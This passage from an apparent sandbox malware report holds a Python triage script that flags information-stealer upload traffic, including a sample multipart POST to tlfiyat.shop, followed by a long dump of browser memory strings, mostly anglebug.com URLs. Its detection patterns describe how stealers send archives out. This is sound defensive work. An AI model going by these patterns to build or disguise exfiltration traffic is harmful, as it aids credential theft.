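    "sec-ch-ua-platform: \"Windows\"\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47\r\n"
    "Accept: */*\r\n"
    "Sec-Fetch-Site: same-site\r\n"
    "Sec-Fetch-Mode: cors\r\n"
    "Sec-Fetch-Dest: script\r\n"
    "Accept-Encoding: gzip, deflate, br\r\n\r\n",
    "POST / HTTP/1.1\r\n"
    "Content-Type: multipart/form-data; boundary=----h4wb1dbiekng47q9hlxl\r\n"
    "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) "
    "Gecko/20100101 Firefox/136.0\r\n"
    "Host: tlfiyat.shop\r\n"
    "Content-Length: 256\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n\r\n",
]

HOST_OS = "Windows"  # the analysis VM, as every Edge/Chrome request in the report shows


@dataclass
class Request:
    method: str
    path: str
    headers: Dict[str, str]  # header names lower-cased


def parse_request(raw: str) -> Request:
    """Parse an HTTP/1.x request head (CRLF or LF) into method, path and headers."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, path, headers)


# Platform the User-Agent claims; order matters only for the first match.
UA_OS_PATTERNS = {
    "Windows": re.compile(r"Windows NT"),
    "macOS": re.compile(r"Macintosh|Mac OS X"),
    "Linux": re.compile(r"X11; Linux|Android"),
}


def ua_platform(ua: str) -> Optional[str]:
    for name, pat in UA_OS_PATTERNS.items():
        if pat.search(ua):
            return name
    return None


def score_request(req: Request, host_os: str = HOST_OS) -> List[str]:
    """Return the indicators that fire for one request (empty list = looks like a browser)."""
    hits: List[str] = []
    ua = req.headers.get("user-agent", "")
    claimed = ua_platform(ua)
    # A UA advertising a different OS than the host it was captured on is a hard-coded UA.
    if claimed and claimed != host_os:
        hits.append(f"ua_platform_mismatch:{claimed}!={host_os}")
    ctype = req.headers.get("content-type", "")
    # Stealers commonly upload their archive as multipart/form-data to the site root.
    if req.method == "POST" and ctype.startswith("multipart/form-data") and req.path == "/":
        hits.append("multipart_post_to_root")
    # Heuristic (assumption): current browsers attach Sec-Fetch-* metadata to every request.
    if req.method == "POST" and "sec-fetch-mode" not in req.headers:
        hits.append("no_fetch_metadata")
    # Heuristic (assumption): a Mozilla/5.0 UA without Accept-Encoding is not a real browser.
    if "accept-encoding" not in req.headers and "mozilla" in ua.lower():
        hits.append("browser_ua_without_accept_encoding")
    # Heuristic (assumption): Chromium and Firefox emit lower-case "keep-alive";
    # the capitalised form is the WinINet/WinHTTP spelling.
    if req.headers.get("connection") == "Keep-Alive":
        hits.append("winhttp_style_connection_header")
    return hits


def triage(raw_requests: List[str], host_os: str = HOST_OS) -> Dict[str, List[str]]:
    """Map Host -> indicators for every request that scores at least one hit."""
    out: Dict[str, List[str]] = {}
    for raw in raw_requests:
        req = parse_request(raw)
        hits = score_request(req, host_os)
        if hits:
            out.setdefault(req.headers.get("host", "?"), []).extend(hits)
    return out


if __name__ == "__main__":
    for host, hits in triage(SAMPLE_REQUESTS).items():
        print(host, hits)
```

Run against the two constructed requests, only tlfiyat.shop scores, on all five indicators; the Edge asset fetch scores none. In a real pipeline the host name would be joined to the DNS log (here the query for tlfiyat.shop appears only in the same run as the POST) and to the process attribution, which the sandbox reports as unknown for this request.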
Source: msedge.exe, 00000009.00000003.1785247106.00007BAC03294000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://129fy.ie.chalai.net
Source: msedge.exe, 00000009.00000003.1785247106.00007BAC03294000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://129fy.ie.chalai.net=
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv10.crl0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3586
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3623
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3624
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4428
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4633
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4722
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4836
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4901
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4937
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5007
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5055
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5061
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5281
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5371
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5375
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5421
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5430
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5535
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5658
